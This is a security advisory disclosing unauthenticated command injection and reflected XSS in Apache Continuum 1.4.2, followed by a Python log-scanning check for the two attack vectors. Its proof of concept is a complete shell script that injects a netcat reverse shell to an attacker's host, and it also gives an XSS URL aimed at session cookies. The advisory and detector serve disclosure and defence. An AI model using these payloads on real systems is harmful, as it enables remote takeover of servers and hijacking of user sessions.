PR1-16: Unauthenticated command injection & reflected XSS within Apache Continuum
Vulnerability found:
5th April 2016
Vendor informed:
8th April 2016
Vulnerability fixed:
"Continuum PMC has been dissolved and the project moved to the Attic (http://attic.apache.org/). The issues you raised are not going to be addressed because there is currently no developer community to address them."
Severity:
Critical
Description: 
Apache Continuum is a continuous integration server for building Java projects (https://continuum.apache.org/).
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
Successfully tested on:
Apache Continuum
Version: 1.4.2 (GA)
Consequences: 
Command injection allows Unix commands to be remotely executed with the permissions associated with the web service account. No authentication is required to exploit this vulnerability. Reflected XSS will allow an attacker to steal an authenticated user's session cookie and impersonate them.
Proof of concepts:
1) Vulnerable to command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
Exploit Code:
#!/bin/sh
if [ $# -eq 0 ]
    then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan - @cyberpunksec ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Vulnerable to Reflected XSS
The cross-site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel
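Until the software can be removed, the two request shapes above can at least be spotted in traffic logs. The following Python check is an added example from this edit, not ProCheckUp's proof of concept or Continuum project code; it assumes a constructed log format in which a reverse proxy or WAF records POST bodies, and all client addresses and values in it are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The two endpoints from the advisory and the parameter each one fails to sanitise.
VULNERABLE = {
    "/continuum/saveInstallation.action": "installation.varValue",
    "/continuum/security/useredit_confirmAdminPassword.action": "user.username",
}
SHELL_META = re.compile(r"[`$;|&\n]")           # backticks, $(...), command separators
HTML_TAG = re.compile(r"<\s*/?\s*[a-z]", re.I)   # any opening or closing tag

def inspect_request(line):
    """Return (path, parameter, reason) if a log line hits an advisory vector, else None.
    Assumed (constructed) log format: "<client> <method> <url> [<post-body>]"; a stock
    access log omits the POST body, so the injection is only visible where a proxy/WAF logs it."""
    parts = line.split(" ", 3)
    if len(parts) < 3:
        return None
    method, url = parts[1], parts[2]
    body = parts[3] if len(parts) == 4 else ""
    split = urlsplit(url)
    param = VULNERABLE.get(split.path)
    if param is None:
        return None
    params = parse_qs(split.query, keep_blank_values=True)
    if method == "POST" and body:
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    for value in params.get(param, []):
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        if SHELL_META.search(value):
            return (split.path, param, "shell metacharacters")
        if HTML_TAG.search(value):
            return (split.path, param, "html markup")
    return None

def scan_log(lines):
    """Return [(line_number, hit)] for every line that inspect_request flags."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := inspect_request(line))]

# Constructed sample log lines (hypothetical clients and values, not real traffic).
SAMPLE_LOG = [
    "10.0.0.5 GET /continuum/",
    "10.0.0.7 POST /continuum/saveInstallation.action installation.name=blah&installation.type=jdk&installation.varValue=%60id%60",
    "10.0.0.7 GET /continuum/security/useredit_confirmAdminPassword.action?username=guest&user.username=guest%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "10.0.0.9 POST /continuum/saveInstallation.action installation.name=jdk8&installation.type=jdk&installation.varValue=/usr/lib/jvm/java-8",
]

for n, (path, param, reason) in scan_log(SAMPLE_LOG):
    print(f"line {n}: {path} parameter {param}: {reason}")
```

The fourth sample line is a legitimate JDK path and is deliberately not flagged, so the check can run against routine Continuum administration traffic without noise from normal installation edits.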
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.